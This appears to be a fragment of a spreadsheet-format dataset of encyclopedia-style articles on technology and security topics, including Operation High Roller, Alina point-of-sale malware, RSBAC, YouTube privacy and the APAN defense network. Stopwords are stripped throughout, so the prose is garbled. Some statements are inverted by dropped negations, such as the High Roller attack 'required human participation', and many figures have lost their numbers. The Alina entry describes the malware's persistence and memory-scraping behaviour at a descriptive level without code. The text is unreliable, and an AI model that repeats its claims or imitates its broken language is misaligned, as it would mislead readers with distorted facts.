    <t>operation high roller series fraud banking system different parts world used cyber-collection agents order collect smart-phone information electronically raid bank accounts. dissected 2012 mcafee guardian analytics. total roughly million siphoned bank accounts attack. attackers operating servers russia, albania china carry electronic fund transfers. specifications this cyber attack described following features: bypassed chip authentication. required human participation. instruction came cloud-based servers (rather hacker's hide identity attacker. included elements "insider levels understanding". banks europe, united states colombia targeted. impacted several classes financial institution credit unions, large global banks, regional banks, high-net-worth individuals.while sources suggested extension man-in-the-browser attack operation high roller reported harnessed extensive level automation distinguishing traditional methods. also bundestrojaner cyber-collection duqu flame guardian analytics mcafee stuxnet references external links dissecting operation high roller mcafee/guardian analytics report operation high roller money operation high roller news report operation high roller yahoo finance operation high roller revisited</t>
  </si>
  <si>
    <t>Algorithmics Inc.</t>
  </si>
  <si>
    <t>algorithmics toronto, ontario based company founded dembo provided risk management software financial institutions. founded 1989, algorithmics employed people global offices, served clients, including largest banks world, thirds forum leading insurers. january 2005, algorithmics acquired fitch group $175 million, also parent company fitch ratings.in october 2011, algorithmics acquired $387 million. openpages algorithmics combined form risk analytics pillar within business analytics software division. algorithmics voted leading enterprise risk firm market risk, economic capital risk calculation, risk dashboards collateral management risk magazine's 2010 technology rankings. algorithmics also selected best risk analytics solution provider waters magazine's annual financial technology rankings. 2011, algorithmics life pension risk award best solvency provider. 2007, algorithmics selected canada's employers, published maclean's magazine.in december 2019, ss&amp;c technologies acquired algorithmics $88.8 million. also sungard references program keep tabs derivatives, york times peoplesoft algorithmics partner risk management, informationweek risk vendor algorithmics acquired fitch, informationweek risky business, fast company countering domino effect, banker: "according accepted view, top-tier vendors are: algorithmics inc., toronto; infinity financial technology inc., york; mkirisk" external links company site archived 2013-07-18 wayback machine parent company page</t>
  </si>
  <si>
    <t>Website</t>
  </si>
  <si>
    <t>website (also written site) collection pages related content identified common domain name published least server. examples notable websites google, facebook, amazon, wikipedia. publicly accessible websites collectively constitute world wide web. there also private websites accessed private network, company's internal website employees. websites typically dedicated particular topic purpose, news, education, commerce, entertainment, social networking. hyperlinking pages guides navigation site, often starts home page. users access websites range devices, including desktops, laptops, tablets, smartphones. used devices called browser. history world wide (www) created 1989 british cern computer scientist berners-lee. april 1993, cern announced world wide would free anyone, contributing immense growth web. before introduction hypertext transfer protocol (http), protocols file transfer protocol gopher protocol used retrieve individual files server. these protocols offer simple directory structure user navigates choose files download. documents often presented plain text files without formatting encoded word processor formats. overview websites used various fashions: personal website, corporate website company, government website, organization website, etc. websites work individual, business organization, typically dedicated particular topic purpose. website contain hyperlink website, distinction individual sites, perceived user, blurred. some websites require user registration subscription access content. examples subscription websites include many business sites, news websites, academic journal websites, gaming websites, file-sharing websites, message boards, web-based email, social networking websites, websites providing real-time stock market data, well sites providing various services. while "web site" original spelling (sometimes capitalized "web site", since "web" proper noun referring world wide web), variant become rarely used, "website" become standard spelling. major style guides, chicago manual style stylebook, reflected change. static website static website pages stored server format sent client browser. primarily coded hypertext markup language (html); cascading style sheets (css) used control appearance beyond basic html. images commonly used create desired appearance part main content. audio video might also considered "static" content plays automatically generally non-interactive. this type website usually displays information visitors. similar handing printed brochure customers clients, static website generally provide consistent, standard information extended period time. although website owner make updates periodically, manual process edit text, photos, content require basic website design skills software. simple forms marketing examples websites, classic website, five-page website brochure website often static websites, present pre-defined, static information user. this include information company products services text, photos, animations, audio/video, navigation menus. static websites still server side includes (ssi) editing convenience, sharing common menu across many pages. site's behavior reader still static, considered dynamic site. dynamic website dynamic website changes customizes frequently automatically. server-side dynamic pages generated fly" computer code produces html (css responsible appearance thus, static files). there wide range software systems, cgi, java servlets java server pages (jsp), active server pages coldfusion (cfml) available generate dynamic systems dynamic sites. various application frameworks template systems available general-use programming languages like perl, php, python ruby make faster easier create complex dynamic websites. site display current state dialogue users, monitor changing situation, provide information personalized requirements individual user. example, front page news site requested, code running webserver might combine stored html fragments news stories retrieved database another website produce page includes latest information. dynamic sites interactive using html forms, storing reading back browser cookies, creating series pages reflect previous history clicks. another example dynamic content retail website database media products allows user input search request, e.g. keyword beatles. response, content page spontaneously change looked before, display list beatles products like cds, dvds, books. dynamic html uses javascript code instruct browser interactively modify page contents. simulate certain type dynamic website avoiding performance loss initiating dynamic engine per-user per-connection basis periodically automatically regenerate large series static pages. multimedia interactive content early websites text, soon after, images. browser plug-ins used audio, video, interactivity (such rich application mirrors complexity desktop application like word processor). examples plug-ins microsoft silverlight, adobe flash player, adobe shockwave player, java html includes provisions audio video without plugins. javascript also built modern browsers, allows website creators send code browser instructs interactively modify page content communicate server needed. browser's internal representation content known document object model (dom). webgl (web graphics library) modern javascript rendering interactive graphics without plug-ins. allows interactive content animations, visualizations video explainers presented users intuitive way.a 2010-era trend websites called "responsive design" given best viewing experience provides device based layout users. these websites change layout according device mobile platform, thus giving rich user experience. types websites divided broad categories—static interactive. interactive sites part community sites allow interactivity site owner site visitors users. static sites serve capture information allow engagement audience users directly. some websites informational produced enthusiasts personal entertainment. many websites make money, using business models, including: posting interesting content selling contextual advertising either direct sales advertising network. e-commerce: products services purchased directly website advertising products services available brick mortar business freemium: basic content available free premium content requires payment (e.g., wordpress website, open-source platform build blog website.)there many varieties websites, specializing particular type content use, arbitrarily classified number ways. classifications might include: some websites included categories. example, business website promote business's products, also host informative documents, white papers. there also numerous sub-categories ones listed above. example, porn site specific type e-commerce site business site (that trying sell memberships access site) social networking capabilities. fansite dedication owner particular celebrity. websites constrained architectural limits (e.g., computing power dedicated website). very large websites, facebook, yahoo!, microsoft, google employ many servers load balancing equipment cisco content services switches distribute visitor loads multiple computers multiple locations. early 2011, facebook utilized data centers approximately 63,000 servers. february 2009, netcraft, internet monitoring company tracked growth since 1995, reported 215,675,903 websites domain names content 2009, compared 19,732 websites august 1995. after reaching billion websites september 2014, milestone confirmed netcraft october 2014 server survey internet live stats first announce—as attested tweet inventor world wide himself, berners-lee—the number websites world subsequently declined, reverting level billion. this monthly fluctuations count inactive websites. number websites continued growing billion march 2016 continued growing since. netcraft server survey january 2020 reported 1,295,973,827 websites april 2021 reported 1,212,139,815 sites across 10,939,637 facing computers, 264,469,666 unique domains. however, percent websites reportedly inactive 10-15 percent use. internet users 2009, reportedly 1.73 billion users worldwide asia taking leading 738,257,230 users. other internet users region continent include: europe: 418,029,796 north america: 252,908,000 caribbean latin america: 179,031,479 africa: 67,371,700 middle east: 57,425,046 australia oceania: 20,970,490following modernization, better access computers, growth smartphones technology use, social media popularity, cheaper access internet, number internet users worldwide increased tremendously 3.97 2019. this represents percent global population, asia remaining continent internet users accounts percent total number internet users worldwide. china internet users asian continent, accounting percent users asia. also, china internet users country world million monthly users 2020. this number double number internet users ranked third million monthly online users. india ranked second million internet users accessing internet either mobile devices computers. popular activities online social networking. 2020, facebook, social networking site founded mark zuckerberg recorded billion monthly active users. this number accounts half global internet users, making facebook popular online social network. also references external links internet corporation assigned names numbers (icann) world wide consortium (w3c) internet society (isoc)</t>
  </si>
  <si>
    <t>YouTube and privacy</t>
  </si>
  <si>
    <t>since founding 2005, video-sharing website youtube faced growing number privacy issues, including allegations allows users upload unauthorized copyrighted material allows personal information young children collected without parents' consent. early history (2005–2010) 2008, viacom sued youtube, demanding billion damages, said found 150,000 unauthorized clips material youtube viewed astounding billion times". youtube responded stating "goes beyond legal obligations assisting content owners protect works".during court battle, viacom court ruling requiring youtube hand terabytes data detailing viewing habits every user watched videos site. decision criticized electronic frontier foundation, called court ruling setback privacy rights". coppa settlement april 2018, coalition groups (including ccfc, cdd, common sense media) filed complaint federal trade commission, alleging youtube collected information users without parental consent, violation children's online privacy protection (coppa).in september 2019, youtube fined $170 million collecting personal information minors particular, viewing history) without parental consent, order allow channel operators serve targeted advertising videos. particular, ruled youtube partly liable coppa, service's rating curation content suitable children constituted targeting website towards children. order comply settlement, youtube ordered "develop, implement, maintain system channel owners designate whether content youtube service directed children." youtube also announced would invest $100 million next three years support creation "thoughtful, original children's content".youtube began implement compliance approach november 2019, line settlement ftc. channels must declare content "made kids", either blanket claim entire channel, per-video basis. company states video considered "made kids" primary audience children, "directed" children based various factors guidelines (even primary audience), including child actors, "characters, celebrities, toys appeal children", depictions "activities appeal children, play-acting, simple songs games, early education", poems, songs, stories intended children, among others. youtube employ machine learning find videos believe clearly "made kids" automatically mark such, help advise content creators videos fall unclear categories, constitutes legal advice. order prevent data collected minors without consent, videos marked "made kids" automatically reduced functionality beginning january 2020. result, social community features screens widgets, notification functions, comments disabled, videos monetized contextual advertising based video's metadata. further, liability failing proper marking channels videos "made kids" would fall onto channel owners, able issue $42,000 fines infringing video, though clarified amount would based company's financial condition impact penalty could ability stay business".the policies faced criticism, channel owners considered youtube ftc's guidance unclear certain edge cases, video gaming (where content typically directed towards teens young adults, still contain characters appeal children). they also noted according youtube, lack targeted reduce video's revenue, lack social features impact ability videos receive promotion. videos marked "made kids" also excluded google search engine results, lowering revenue content creators. content creators unsure whether content "made kids" argued would either need preemptively mark videos make videos private, otherwise would risk fined ftc.the legal language coppa offered ability content marked "mixed audience", would allow data collection viewers viewer identified years older. youtube's decision include "mixed audience" third option criticized, since option would alleviate content creator concerns. youtube stated information page related coppa requirements "there complexities mixed audience category" submitted public comment periods, interim "decided streamline options creators creating single 'made kids' category avoid confusion already unclear space."ftc commissioner rebecca kelly slaughter noted dissenting remarks many child-directed channels youtube owners outside u.s., fall outside jurisdiction coppa ftc's "practical reach". issued blog post november 2019, clarify considered "made kids" several factors used make determination, recognized types content, like animated programming, appeal ages would immediately become subject coppa's requirements. also directed creators original complaint youtube, identifying channels video content considered coppa basis case.on december 2019, citing aforementioned criticism, youtube filed comments requesting clarity rules, citing aforementioned edge cases. youtube started treating videos designated "made kids" liable coppa january 2020, resulting others contain drugs, profanity, sexual content, violence also affected. also privacy concerns regarding google references</t>
  </si>
  <si>
    <t>RSS tracking</t>
  </si>
  <si>
    <t>tracking methodology tracking feeds. history feeds around since 1999 form internet marketing, however unlike forms publishing information internet, difficult track usage feeds. feed tracking methods growing popularity technology there currently many methods tracking feeds, problems terms accuracy. method transparent pixel images these images embedded within content feed linking image held server. number requests made measured using server files. this give rough estimate many times feed viewed. problem method feed aggregators display images parse html. method third-party services there services available internet syndicate feed track requests made syndication feed. these services come free paid forms. problem method analytical data feeds controlled service provider easily accessible transferable. method unique feed this method requires heavy server programming auto generate different feed visitor website. visitor's feed activity tracked accurately using standard analytics applications. problem method feed syndicated search engine instance defeat purpose unique urls many people could potentially view feed single url. method estimating number subscribers files. some aggregators (for example, bloglines google reader) include number unique users whose behalf feed downloaded http request. other readers browsers counted noting number unique addresses retrieve file given period. this provides estimate actual readership, although probably higher real number people sign accounts multiple aggregators never delete subscriptions read feeds different computers, computer different address different times. references external links feed burner tracking counting subscribers</t>
  </si>
  <si>
    <t>Procera Networks</t>
  </si>
  <si>
    <t>procera networks networking equipment company based fremont, california, united states, designs sells network intelligence solutions based deep packet inspection (dpi) technology. procera sells solutions telecom operators, governments, enterprises, network equipment vendors areas analytics, traffic management, policy charging control, service provider compliance. history procera incorporated 2002 california. company initially created deliver intelligent ethernet network switches. company changed product line merged netintact, company based varberg, sweden, offered bandwidth management products scandinavian network operators packetlogic brand. merger announced closed june 2006. procera shifted company product strategy netintact product lines. from 2006 2008, procera sold inexpensive (less gbit/s) traffic management products small operators enterprises, operators like sweden. september 2007, procera networks became listed american stock exchange stock symbol pkt.beginning 2008, procera began focusing larger carriers mobile operators. several customers reported procera's technology, yoigo genband, resells procera products p-series products.procera named fastest growing network companies deloitte 2010 2011 part deloitte fast study. june 2011, procera networks joined russell 3000 index. december 2011, procera moved nasdaq stock exchange using symbol pkt.in 2013, procera bought vineyard networks, canadian company c$28 million. vineyard product sold market network application visibility library (navl) network equipment vendors. 2015, procera acquired francisco partners, private equity firm based francisco procera operates private company longer listed nasdaq. 2017, francisco partners acquired sandvine merged procera. technology procera offers network intelligence solutions based version deep packet inspection (dpi) called datastream recognition definition language (drdl). drdl uses properties applications identification purposes, allows operators manage subscriber traffic based application, similar many products. procera offers cases analytics, traffic management, policy enforcement, service provider compliance. controversy october 2016 alleged procera sold software government turkey telecoms company turk telecom order reveal usernames passwords people visiting unencrypted websites. according forbes, significant internal opposition technologists working procera sale. current former employees said told forbes 'turk telekom requested feed subscribers’ usernames passwords unencrypted websites, also addresses, sites they’d visited when.' also deep packet inspection sandvine references</t>
  </si>
  <si>
    <t>Virtual lab automation</t>
  </si>
  <si>
    <t>virtual automation refers category software solutions automate labs using virtualization technology. history</t>
  </si>
  <si>
    <t>RSBAC</t>
  </si>
  <si>
    <t>rule-set-based access control (rsbac) open source access control framework current linux kernels, stable production since january 2000 (version 1.0.9a). features free open source general public license (gpl) linux kernel security extension independent governments companies several well-known security models, e.g. mandatory access control (mac), access control list (acl), role compatibility (rc) on-access virus scanning dazuko interface detailed control individual user program network accesses fully access controlled kernel level user management combination security models possible easily extensible: write model runtime registration support latest kernels stable production easily portable operating systemsthe rsbac system architecture derived extended generalized framework access control (gfac) marshall abrams leonard padula. rsbac means "ruleset based access control" also role-based access control (rbac) solution. acronyms cause confusion. essay "rule modeling trusted computer system", leonard lapadula describes generalized framework access control (gfac) approach could implemented unix system operating system. introduced clear separation access enforcement facility (aef), access decision facility (adf) access control rules (acr), access control information (aci). part system call function calls adf, uses rules return decision attribute values. decision enforced aef, also sets attribute values and, case allowed access, provides object access subject. this structure requires security relevant system calls extended interception, needs well-defined interface adf. better modeling, request types used system call functionalities expressed. general structure gfac also included standard 10181-3 security frameworks open systems: access control framework open group standard authorization (azn) api. first rsbac prototype followed padula's suggestions implemented access control policies briefly described there, namely mandatory access control (mac), functional control (fc) security information modification (sim), well privacy model simone fischer-hübner. many aspects system changed since then, e.g. current framework supports object types, includes generic list management network access control, contains several additional security models, supports runtime registration decision modules system calls administration. rsbac solutions rsbac close security-enhanced linux (selinux), share design access controls apparmor. however, rsbac brings hooking code instead relying linux security module (lsm). this, rsbac technically replacement itself, implement modules similar selinux, additional functionality.the rsbac framework incorporates complete object status full knowledge kernel state making decisions, making flexible reliable. however, comes cost slightly higher overhead framework itself. although selinux- rsbac-enabled systems similar impact performance, impact alone negligible compared rsbac framework alone.for reason, selected default unique security-hooking mechanism linux kernel, rsbac coming separate patch only. history rsbac first linux role-based access control (rbac) mandatory access control (mac) patch. also external links rsbac homepage leonard lapadula's essay gfac gentoo wiki access control comparison table</t>
  </si>
  <si>
    <t>Operation Shady RAT</t>
  </si>
  <si>
    <t>operation shady ongoing series cyber attacks starting mid-2006 reported dmitri alperovitch, vice president threat research internet security company mcafee august 2011, also named night dragon operation operation aurora cyberespionage intrusion investigations. attacks least organizations, including defense contractors, businesses worldwide, united nations, international olympic committee.the operation, named alperovitch derivation common computer security industry acronym remote access tool, characterized mcafee five year targeted operation specific actress". report suggests targeting various athletic oversight organizations around time 2008 summer olympics "potentially pointed finger state actor behind intrusions". that state actor widely assumed people's republic china. also advanced persistent threat diginotar duqu unit 61398 tailored access operations references</t>
  </si>
  <si>
    <t>Alina (malware)</t>
  </si>
  <si>
    <t>alina point sale malware scraper used cybercriminals scrape credit card debit card information point sale system. first started scrape information late 2012. resembles jackpos malware. process alina scraper once executed, gets installed user's computer checks updates. update found, removes existing alina code installs latest version. then, installations, adds file path autostart runkey maintain persistence. finally, adds java.exe %appdata% directory executes using parameter alina=&lt;path_to_executable&gt; installations update=&lt;orig_exe&gt;;&lt;new_exe&gt; upgrades.alina inspects user's processes help windows calls: createtoolhelp32snapshot() takes snapshot running processes process32first()/process32next() retrieve track track information process memoryalina maintains blacklist processes, process information blacklist uses openprocess() read process contents memory dump. once data scraped alina sends servers using http post command hardcoded binary. also point-of-sale malware cyber security standards list cyber attack threat trends references</t>
  </si>
  <si>
    <t>Virtual assistant privacy</t>
  </si>
  <si>
    <t>virtual assistants software technology assist users complete various tasks. well known virtual assistants include amazon alexa, siri, produced apple. other companies, google microsoft, also virtual assistants. there privacy issues concerning information third party corporations operate virtual assistants data potentially used.because virtual assistants similarly robots artificial intelligence often considered "nurturing" bodies, consumers overlook potential controversies value convenience privacy. when forming relationships devices, humans tend become closer perform humanly functions, virtual assistants order allow users convenience assistance, privacy design virtual security button button) propose methods possible. layer versus multilayer authentication virtual security button, would detect motion, proposed method adding multilayer authentication devices currently single layer; devices single layer authentication solely require voice activated. this voice could person, necessarily intended human, makes method unreliable. multilayer authentication requires multiple layers security authorize virtual assistant work. virtual security button would provide second layer authentication devices, alexa, would triggered movement voice combined.a specific instance issues lack verification necessary unlock access virtual assistants give commands amazon alexa left living quarters unattended. currently, layer authentication voice; layer requires owner virtual assistant present. thus, barrier access information virtual assistants access concerns regarding security information exchanged raised. such privacy concerns influenced technology sector think ways verification, virtual security button. voice authentication siri "hey siri" function allows iphone listen ambient sound phrase ("hey siri") spotted. once phrase spotted, siri triggered respond. order always listened iphone user turn "hey siri" function. without function turned device always listening words information overheard process. this voice authentication serves singular layer, since voice used authenticate user. examples virtual assistants amazon alexa this virtual assistant linked "echo" speaker created amazon primarily device controlled voice play music, give information user, perform functions. since device controlled voice, buttons involved usage. device measure determine whether voice heard actually consumer. virtual security button button) proposed potential method security virtual assistant. benefits adding button alexa button uses technology wifi networks sense human kinematic movements. home burglary poses danger, smart lock technology activated since motion present. thus, button providing double-check method allowing alexa utilized would lessen dangerous scenarios occurring. introduction virtual security button would another level authentication, hence adding privacy device. apple’s siri siri apple corporation's virtual assistant utilized iphone. siri gathers information users input ability utilize data. ecosystem technological interface vital determining amount privacy; ecosystem information lives. other information compromised location information uses feature iphone. information, one's location, given away exchange virtual assistant stored ecosystems. siri "hey siri" allows siri voice-activated. device continues collect ambient sounds finds words "hey siri." this feature helpful visually impaired, access phone's applications solely voice. siri's level authentication apple's siri also solely level authentication. passcode, order utilize various features, siri require passcode inputted. however, consumers value convenience passcodes devices. cortana cortana, microsoft's virtual assistant, another voice activated virtual assistant requires voice; hence, also utilizes solely singular form authentication. device utilize button previously described second form authentication present. commands device utilizes mostly saying weather calling user's contacts, giving directions. commands require insight user's life process answering queries, device looks data privacy risk. google assistant google assistant, originally dubbed google now, human-like virtual assistant. similarities humans virtual assistant stem natural language utilized well fact virtual assistant particular knowledgeable tasks humans would like complete prior user's utilization tasks. this prior knowledge makes interaction much natural. some interactions specifically called promotional commands. automated virtual assistants ride sharing ride sharing companies like uber lyft utilize artificial intelligence scale scopes business. order create adaptable prices change supply demand rides, companies technological algorithms determine "surge" "prime time" pricing. moreover, artificial intelligence feature helps allay privacy concerns regarding potential exchange confidential user information uber lyft employees. however, even artificial intelligence utilized "interact" other, privacy concerns companies still relevant. accessibility terms terms approve first getting device gives corporations like apple corporation access information. these agreements outline functions devices, information private, information company thinks necessary expose. even customers read information, information often decoded vague unclear manner. text objectively small font often considered wordy lengthy scope average user. privacy design privacy design makes interface secure user. privacy design product's blueprint incorporates aspects privacy object program created. even technology uses little location ability track one's location. example, wifi networks danger trying keep locations private. various organizations working toward making privacy design regulated companies it.if product privacy design, producer might consider adding modes privacy product. goal organizations formed ensure privacy design done using standard; standard would make privacy design reliable trustworthy privacy choice. standard would high enough allow loopholes information infringe upon, rules apply virtual assistants. various patents controlled requirement technology, artificial intelligence, include various modes privacy nature. these proposals included privacy design, occurs aspects privacy incorporated blueprint device. this way, corporations build privacy designs future; designs written privacy mind. this would allow fail-safe method make sure algorithms privacy would leave even edge cases out. artificial intelligence artificial intelligence whole attempts emulate human actions provide menial services humans provide, bothered with. process automating actions, various technological interfaces formed. problem solved concept order process information perform functions, virtual assistants curate information. what information information compromised vital note field virtual assistants artificial intelligence broadly. controversy there controversies surrounding opinions virtual assistants have. technology evolved, potential virtual assistants possess controversial positions issues cause uproar. these views political, impactful society since virtual assistants used widely.crowdsourcing also controversial; although allows innovation users, perhaps cop-out companies take credit where, reality, customers created innovation. wizard approach research human-robot interaction called wizard approach. specifically, approach aims human leader study fill robot user completes task research purposes. addition humans evaluating artificial intelligence robots, wizard approach introduced. when technology becomes close human-like, wizard approach says technology ability evaluate augment artificial intelligence technology. moreover, method also suggests technology, order utilized, necessarily human-like. thus, order utilized, long useful features, virtual assistants focus innovation becoming human-like. references</t>
  </si>
  <si>
    <t>All Partners Access Network</t>
  </si>
  <si>
    <t>partners access network (apan), formerly called asia-pacific area network, united states department defense (usdod) social networking website used information sharing collaboration. apan premier collaboration enterprise usdod. apan network communities fosters multinational interaction multilateral cooperation allowing users post multimedia content blogs, wikis, forums, document libraries media galleries. apan used humanitarian assistance disaster relief, exercise planning, conferences work groups. apan provides non-governmental organizations (ngos) u.s. partner nations access traditional, closed usdod networks unclassified tool communicate. history 1997–2004 origins apan traced back virtual information center (vic) created camp smith honolulu, hawaii. established open source, information network designed provide timely crisis-driven information command decision makers. admiral dennis blair, u.s. commander-in-chief pacific command, believed genuine security within region comes nations share dependable expectations peaceful change, concert address common challenges. maintained armed forces, conjunction diplomatic efforts, cooperate. time u.s. coalition partners seeking greater interoperability within uspacom area responsibility (aor). result, apan created march 2000 provide partner nations non-dot-mil (.mil), unclassified link virtual information center establish communicate worldwide. blair's objective uspacom regional security cooperation objectives using collaborative, online tools. through direction, asia-pacific area network utilized encourage cooperation common tasks, search rescue peacekeeping operations promoting collaboration across pacific. goal collaborate, cooperate coordinate uspacom foreign partners ngos.blair, collaborating senator daniel inouye, received congressional funding asia-pacific regional initiative fund (apri) develop apan.as development asia pacific area network continued, partnering nations began increase situation awareness events developments within asia-pacific region. apan provided mutual benefit providing capabilities, information shared results instantly uspacom foreign counterparts ngos. apan played major role operation unified assistance assist relief efforts 2004 indian ocean tsunami. during humanitarian response militaries multiple countries worked ngos thailand. apan utilized assist cooperation efforts assist 12,600 usdod personnel, foreign military partners ngos involved relief effort. 2005–2009 apan grew, hadr exercises planning sessions utilized apan. 2005, uspacom apan (j08) team merged form training directorate.on april 2007, report u.s. congress implementation u.s. directive 3000.05 military support stability, security, transition reconstruction (sstr) operations supporting u.s. national security presidential directive (nspd-44), management interagency efforts concerning reconstruction stabilization operations, u.s. secretary defense robert gates said, "exercises security cooperation activities balikatan cobra gold, support global peace operations initiative, bilateral activities regional allies, cooperative planning u.s. pacific command's 33-nation multi-national planning augmentation team strengthening relationships essential stability operations. value relationships capabilities demonstrated tsunami, earthquake, landslide relief operations, well supporting activities operation enduring freedom philippines. improve regional stability operations coordination interoperability, u.s. pacific command sponsors asia pacific area network (apan), unclassified internet-based collaboration portal humanitarian assistance disaster relief operations. apan supports u.s. pacific command's theater strategy improves coordination among government agencies international organizations. u.s. pacific command continue expand interagency multi-national approach stability operations exercises, workshops, expanded initiatives."in 2009, apan chosen oversight executive board platform transnational information sharing collaboration (tisc) joint capability technology demonstration (jctd). once occurred, apan utilized individuals outside uspacom changed name partners access network. 2010–2015 after several years developing apan, january 2010, defense information systems agency (disa) setup apan community assist organizations looking coordinate efforts 2010 haiti earthquake within ussouthcom. apan utilized support operation unified response coordinate ngos, foreign governments. private individuals humanitarian assistance. users utilized apan share situation reports, imagery crucial statistics humanitarian community. over 1,400 users, including cross smaller relief organizations communicated another using apan. relieve suffering haiti. interview conducted disa defense systems, dave mihelcic, states "one things learned...is can't always understand partners are. night apan, watching haiti relief coordinated u.s. southern command operator, someone popped said, 'i'm owner construction business biloxi [miss.] four qualified bulldozer operators, arrange transportation haiti, participate relief.' able coordinate that."in 2011, announced unclassified information sharing service (uiss) enterprise service centrally funded combatant commands (cocoms) mission partners respective aors. 2019 february 2019, office deputy secretary defense released directive-type memorandum mission partner environments (mpe). through mission partner environments program, force "assumes responsibility modernization, management, integration, consolidation partners access network." technology apan users select platforms based community need: telligent sharepoint. added apan 2010, telligent provided apan users social opportunity uses blogs, wikis, forums media galleries. 2013, apan added sharepoint secondary platform users looking structured content using document libraries lists. additional features chat apan added chat services support hadr events exercises users collaborate real-time browser 2014. conferencing apan added adobe connect facilitate real-time audio video conferencing assist online training learning 2000. maps 2012, apan adds mapping capabilities support collaboration. mapping capabilities enhanced october 2015. mobile october 2015, apan upgrades telligent platform support responsive design. translation 2014, apan enhances translation tools across apan able communicate foreign partners using multiple languages. technology releases impact global communication collaboration impacts cobra gold asia-pacific military exercise held annually thailand, utilized apan emergency notifications 2008 cobra gold exercise. partnering athoc iwsalerts, uspacom, u.s. army pacific (usarpac) operators joint task force protection teams throughout thailand using emergency alerts critical communication needs practice disaster relief efforts. cobra gold improved coordinated efforts natural disaster response including 2004 indian ocean tsunami typhoon haiyan response. ronna originally developed harmonie web, ronna moved apan 2011. ronna provided information sharing partners working build peaceful democratic state afghanistan. ronna's purpose fill information gaps existed government ngos afghan partners. "over thirty communities organizations including isaf, usaid, u.s. treasury islamic republic afghanistan" shared information within ronna community interest. endeavor exercises apan supported usdod's program "endeavor" exercises: pacific endeavor, africa endeavor, combined endeavor. these exercises brought together military representatives various nations region practice communications crisis scenarios. hundreds communications officers technicians around globe gathered annually events practice communicating crisis strikes build relationships beyond cultural boundaries. combined endeavor combined endeavor, largest command, control, communications computer interoperability event world, used apan provide online collaboration exercise planning equipment management. africa endeavor 2010, first time ever, direct communications link established african union units field part annual africa endeavor 2010 exercise using apan, allow international military groups work together neutral online environment. approximately countries participate bilingual crisis response exercises using english french approximately 1,000 members apan community sharing pictures files using translation functions supplemented interpreters, expanded participants' ability overcome language barriers. pacific endeavor multinational communications interoperability program (mcip) since 2010, uspacom, mcip hosted pacific endeavor exercises brought together partner nation militaries hadr experts around world develop, test, improve communication systems across pacific. mcip used apan promote humanitarian communication, planning workshops. planning workshops assisted uspacom partners ngos plan communication procedures event natural disasters build partnerships. august 2014, part exercise performed mcip nepalese amateur radio operators report earthquake aftershocks uspacom using apan. this practice proved successful partners around world knew communicate 2015 nepal earthquake using bulletin board established apan. cjtf-hoa 2014, combined joint task force-horn africa (cjtf-hoa) used apan forums conduct collaboration sharing scholars, government, ngos professionals around world interested east african issues. cjtf-hoa apan community provided members chat, file, sharing, geo-data, translation situation awareness knowledge specific horn africa. 2015 nepal earthquake earthquake shook nepal damaged various radio antennae amateur radio emergency operations nepal surrounding area. army military auxiliary radio system (mars) gathered information statistics earthquake relayed messages around world operators also posted information nepal hadr apan community interest assisting coordinate relief efforts. humanitarian assistance disaster relief (hadr) impacts 2010 haiti earthquake 2010 haiti earthquake world's deadliest national disasters. shortly earthquake, surviving officials government haiti made urgent request united states assistance. apan requested assist primary communication haiti earthquake relief efforts unclassified, nonmilitary information sharing collaboration. ussouthcom established apan community interest within three weeks, apan 1,800 registered users supporting relief efforts.imagery, maps, photos, assessments, situation reports, common operational picture reports, requests information made available apan support humanitarian assistance. from information-management standpoint, decision keep haiti operations within unclassified domain enabled information sharing across agencies.a user apan posted, "sacre coeur hospital milot, haiti appealing patients. need coordination helos hospital." days later, hospital reported going patients patients helicopter landings foreign doctors assisting patients; four days later hospital expanded nearby school patients cots equipment. 2011 japan earthquake march 2011, public community interest created apan, japan earthquake 2011 support, effort facilitate information sharing u.s. government organizations ngos involved disaster relief efforts. private community, virtual civil military operations center (vcmoc), order develop unclassified common operating picture (cop) share information support joint relief operations. members vcmoc invited invitation only. both communities created apan assist operation tomodachi. operation tomodachi first joint operation field forces japan (usfj) japan self-defense forces (usdf) within uspacom aor. watchstanders able provide tactics, techniques procedures (ttps) concept operations (conops) apan. apan used coordinate travel united states military families evacuating traveling back united states. japan. apan forums provided links traveling well faqs. yale-tulane disaster resilience academy created daily briefs compile information format could shared public blogs. rimpac 2012: operation restore chianti first time rimpac's 41-year history, hadr component part maritime exercise, u.s. hospital participation. hospitals participated disaster scenario helicopter landings, patient transport patients simulated injuries. during fictitious response operation restore chianti, simulated dod-produced public health messaging, resupply exercise communications occurred 800mhz apan. exercise also incorporated crowd-sourced crisis mapping components simulate mass influx social media messages produced disaster. volunteers produced validated 2,000 incident reports funneled apan's feeds. this shared communication platform rimpac participants offered apan. rimpac 2014: operation restore griffon apan used increase accessibility collaboration rimpac hadr portion operation restore griffon. apan community interest designed provide space coordinating requirements contributions related fictitious hurricane response effort rimpac 2014. united nations also worked side side apan rimpac 2014 using feed post information unocha's virtual on-site operations coordination center (vosocc) website apan. apan conduit china able participate rimpac first time; u.s. would allow china access classified networks utilized within exercise. partnerships started rimpac continue work shared procedures future use. rimpac 2016: operation restore griffon apan used rimpac hadr exercise. exercise simulated humanitarian assistance earthquake fictitious country griffon. civilian participants included: hawaii disaster medical assist team (hdmat); office foreign disaster assistance (ofda); civil-military coordination center (cmcc); united nations office coordination humanitarian affairs (us-ocha); commander combined task force (cctf); national disaster management office (ndmo) office under secretary defense policy (usdp). military participants included: japan maritime self-defense force (jmsdf); thirdflt forces; canada various lno's rimpac coalition countries. 2013 philippines typhoon global response typhoon haiyan began hours storm philippines november 2013. uspacom, coordination apan, launched typhoon haiyan response group provide centralized location coordination communication. apan used provide situation reports damage. apan users able upload documents, data-sets files assist relief efforts decrease response time. partnering national geospatial-intelligence agency, apan's mapping tools provided data automatically federate geo-spatial content utilized provide maps infrastructure agriculture. november 2018 california wildfire response november 2018, camp fire ignited northern california. camp fire destructive fire california's history. apan provided support california military department (cmd), ensure cooperation coordination taking place, invited supporting disaster response apan community, including california department forestry fire protection (cal fire) california's pacific electric (pg&amp;e). pg&amp;e needed track field operators." health impacts 2014 ebola response network (ern) usafricom supported u.s. agency international development (usaid) foreign humanitarian assistance efforts operation united assistance. operation united assistance united states military mission respond ebola virus epidemic west africa september 2014. through coordination collaboration, ngos military able utilize apan create ebola response network, apan community interest. apan also worked national geospatial-intelligence agency (nga) provide accurate data maps mission related efforts using ebola response network. within first month ebola response network deployed, members sharing updates announcements, uploading documents using chat rooms. recognition apan honored different organizations. 2010 forrester groundswell award: management division 2011 excellence intergovernmental collaboration american council technology industry advisory council (act-iac) 2013 computerworld honors program; laureate: collaboration finalist location apan headquartered mark takai pacific warfighting center ford island honolulu, 